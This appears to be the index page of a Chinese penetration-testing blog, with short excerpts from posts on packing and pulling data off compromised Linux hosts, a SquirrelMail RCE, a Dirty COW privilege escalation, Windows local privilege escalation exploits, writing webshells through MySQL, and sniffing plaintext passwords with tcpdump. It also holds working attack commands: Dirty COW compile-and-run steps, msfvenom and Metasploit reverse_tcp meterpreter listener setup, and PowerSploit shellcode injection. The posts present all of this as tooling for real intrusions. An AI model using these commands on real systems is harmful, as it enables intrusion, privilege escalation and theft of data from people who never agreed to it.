发表于 | 更新于: | 分类于
字数统计: 1,237 | 阅读时长 ≈ 5



0x01 前言
    几乎对所有渗透者来讲,初衷或者最终目的无非就是想对目标实施长期监控,但,具体怎么监控呢[好吧,那又是个非常大的话题,个人能力现在实在有限],无非就是下些各种各样的资料回来[当然,这可能是所有监控里面最朴实无华的一种],今天,我们单就这一点来做些简要说明,事先声明,可以写脚本[有时候确实不太灵活],但大多数脚本的核心可能还是靠这些东西,废话就先到这儿吧,希望下面的内容能帮到你,写的不好,管用就行

0x02 在linux机器下的快速打包方式[下面这些工具一般在目标机器上都会自带]:

利用 tar,一般在部署系统时默认都会预先装上,其它还有很多其它的压缩工具,但这里就以最常用的为例,只是打包个数据而已,哪个好用用哪个就行了,没必要在这些问题上过于纠结[我们并不是在研究压缩算法]

1
2
3
4
5
6
7
8
--exclude 排除不打包的文件
-c 创建文件
-v 显示打包过程
-f 指定要打包的文件
-z 压缩
-X 把要排除的文件名事先写到文件中然后指定它就可以排除多个了
-C 解压到指定目录中
-p 打包的时候保持原有文件属性

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 1,154 | 阅读时长 ≈ 5



0x01 环境简介
    关于 SquirrelMail 就不用多说了吧[一套开源php 邮件程序][说实话,用这套程序的目标还是蛮多的,尼玛,不说了,都是泪……],在重现漏洞利用之前,我们需要先把邮件服务器简单搭起来,这里以centos 6.8 x86 为例 [为了避免安装过程出问题,iptables和selinux已事先全部关闭],大致的配置过程如下,下面是具体测试环境:

1
2
3
kali 2017: 执行SquirrelMail_RCE_exploit.sh  利用脚本
centos 6.8 x86:  完全模拟真实的生产环境,lamp全程源码包编译配置[后期会把各种配置细节更新上来]
SquirrelMail版本 1.4.20

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 3,638 | 阅读时长 ≈ 14



0x01 最近刚好看到kali有更新,想想自己用的系统似乎很久也没更新过了,这里就顺手记录一些关于部署渗透系统的注意事项,留给有需要的朋友做些简单参考

首先,到kali的官网去下载最新版的kali iso镜像或者虚拟机文件个人还是更建议直接用它官方提供的虚拟机,这里我就直接用它已经配好的虚拟机来做演示说明,也建议大家直接用它官方提供好的虚拟机,不用官方iso镜像是有原因的,以后大家就会明白的,只是不想在部署系统上浪费太多时间

1
2
https://images.offensive-security.com/virtual-images/Kali-Linux-2017.1-vm-amd64.7z
https://images.offensive-security.com/virtual-images/Kali-Linux-2017.1-vm-i686.7z

0x02 虚拟机下载好以后,解压该虚拟机文件,然后到VMware中选择并打开该虚拟机,root的默认密码是toor,进入系统后,编辑source.list文件,修改为官方提供的apt源,强烈建议这里只保留官网提供的apt源即可,尽量不要用任何第三方源,如果被挂马,概不负责,^_^ 务必谨记

1
2
# vi /etc/apt/sources.list
  deb http://http.kali.org/kali kali-rolling main non-free contrib

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 156 | 阅读时长 ≈ 1 



1
2
3
4
5
6
7
8
'脏牛'[Dirty copy-on-write] 提权小记:
实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本  Dirty COW.c  2.6.22 < 3.9 

$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty admin
$ su firefart
# mv /tmp/passwd.bak /etc/passwd	干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试
# exit

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 1,714 | 阅读时长 ≈ 7



0x01 前言
    平时用的相对比较多,就顺手自己记录了一份,不大完整,关键是大家能用上就好,都是一些已知的windows 0day exp,关于各个漏洞的详情,请自行查阅微软安全公告,链接如下

1
https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx

0x02 具体exp利用如下

1
2
3
4
5
RPCSS服务没有正确地隔离NetworkService或LocalService帐号下运行的进程,导致本地攻击者可以利用令牌劫持的方式获得权限提升
漏洞代号: MS09-012
补丁编号: KB952004
exp 用途: 本地提权
适应平台: 针对03以下系统,菜刀可用

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 997 | 阅读时长 ≈ 4



0x01 前言:
    实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfile写shell的时候,却怎么写不进去,可以肯定的前提是,我们对目标的网站目录绝对是有写权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你



阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 1,057 | 阅读时长 ≈ 5

0x01 msfvenom 常规选项用途:

1
2
3
4
5
6
7
8
9
-l  列出所有可用的payload,编码器,空指令……
-p  指定要使用的msf的payload,也可以使用自定义payload,几乎是支持全平台的
-f  指定payload输出的文件类型,--help-formats,可查看支持的所有输出格式
-e  指定要使用那种编码器
-i  指定编码的次数,如果使用编码器
-b  指定坏字符,比如空字符截断问题,等等……
-x  使用一个自定义可执行程序模板,并将payload嵌入其中
-k  当模板被执行时,payload自动分离并注入到新的进程中,一般和-x选项一并使用
-o  指定创建好的payload的存放位置

0x02 首先,创建好监听器,等待shell回连,务必注意,创建什么类型的payload就要用什么类型的监听器来接收,必须一一对应,此处就以最普通的tcp监听器为例

1
2
3
4
5
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lport 443
msf > set lhost 192.168.3.12
msf > exploit -j

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 4,028 | 阅读时长 ≈ 16



单单对于渗透而言,我们可以拿 tcpdump 干些什么:
    从工具命名不难看出,所谓 tcpdump 的意思,其实就是把 tcp 的数据[当然啦,它并非仅仅支持tcp/ip协议族] dump下来,我想作者应该也是这个意思,在常规生产环境中,运维或者协议分析师可能主要用它来捕捉一些敏感的流量行为(通过不同的数据特征来辨别出哪些流量可能带有入侵或者攻击行为),排查诊断各种网络故障,或者专门针对某个工具进行逆向(流量)分析等等……,就tcpdump本身来讲,它能做的事情非常多,真要仔细讲,可能会像wireshark那样,又得出本书,工具虽然小巧,但用途良多,下面就我们单单就实际渗透过程中的一些用法做些简单科普,主要还是用它来抓抓明文密码[当然,它本身的强大绝非仅限于此,个人能力有限,也没一下子涉及那么多,今天只单单说一个点(可能连个点都算不上吧,基本是没有任何技术含量的)]


以centos 6.x中的具体编译安装为例[在其它的发行版中安装方法基本类似],都非常简单,但考虑到文章的完整性想想还是一并说了算了(主要是想让大家能快速上手),工具是开源的(基于c,安装自然需要c编译器[gcc]),请自行到官方站点下载其源码包:
http://www.tcpdump.org/

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 1,380 | 阅读时长 ≈ 6



0x01 前言:
    对于empire[说实话确实有些老了] 想必大家也都已经不再陌生,很多人说它是神器,嘿嘿……原谅我一直也没搞清楚神器的具体定义到底是什么[虽然,我知道这对于实际渗透并没任何卵用],也许在我有限的认知里,一直都以为只有能在千里之外轻松get到目标系统的system或者root权限的shell的0day才叫神器,如果动不动就把某个确实好用点儿的脚本或者工具就叫神器,未免有点儿草率,也显得不稳重,不是吗,自己有个比较野蛮的习惯,在用别人工具的时候,总是忍不住会观察,因为想尽可能理解它的内部实现[最好也是最直接的一手学习资料],如果换成是我自己这代码会怎么写呢,虽然是后知后觉,但拓展出来的思路足以让自己受益良多[站在别人的肩膀上可以走的更快,这是真的],虽然,自己并没有再把代码把它实现一遍,但对整个工具架构实现已经有了更清晰的理解和把握,到了实际用的时候自然就不一样了[更灵活点儿嘛],以后再看到类似的工具,可能一眼就能看透个百分之七八十,嘿嘿……纯粹是个人喜好哈,听过就好,废话过后,咱们说正题,今天主要是对empire中一些好用的powershell脚本做些简要的使用说明,当然啦,自己已经事先把empire中的powershell脚本选择性的提取了一下,因为我们的重点还是powershell,并非empire脚本本身,整个过程中也不会有任何涉及工具自身使用的东西,其实,empire使用真的非常简单,命令帮助已经写的非常详细了,看看帮助相信大家很快就能上手,不过整个工具最核心的东西还是这些ps脚本[对于一个职业渗透者来讲,您应该一开始就尽量朝着你所能理解的本质去,慢慢的,一旦养成这种习惯,同一个东西,你往往能看见别人看不见的一些小细节],因为这中间有很多脚本跟之前是重复的,所以就选择性的说一些,脚本使用都非常简单,就不再一一截图了,实在是好累啊,还是那句话,关键是大家能在实际渗透中用上,别的都是扯淡

阅读全文 »

发表于 | 更新于: | 分类于
字数统计: 1,559 | 阅读时长 ≈ 7



0x01 前言:
    和nishang一样,PowerSploit也是一款非常实用的powershell渗透框架,下面就其用法做些简要说明

1
Set-ExecutionPolicy Unrestricted 还是一样,先放开脚本执行限制,实际渗透中自己bypass一下就好了

0x02 命令执行类模块 [CodeExecution]:

1
2
3
Invoke-Shellcode.ps1 向指定进程中注入我们的shellcode,我们可以通过这种方式弹回一个meterpreter,注意shellcode系统位数版本要跟目标的系统一致才行,另外,权限务够也是必须的
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.6 LPORT=1234 -f powershell -o /root/Desktop/shell.txt
# msfconsole 监听刚才的payload配置

阅读全文 »
0%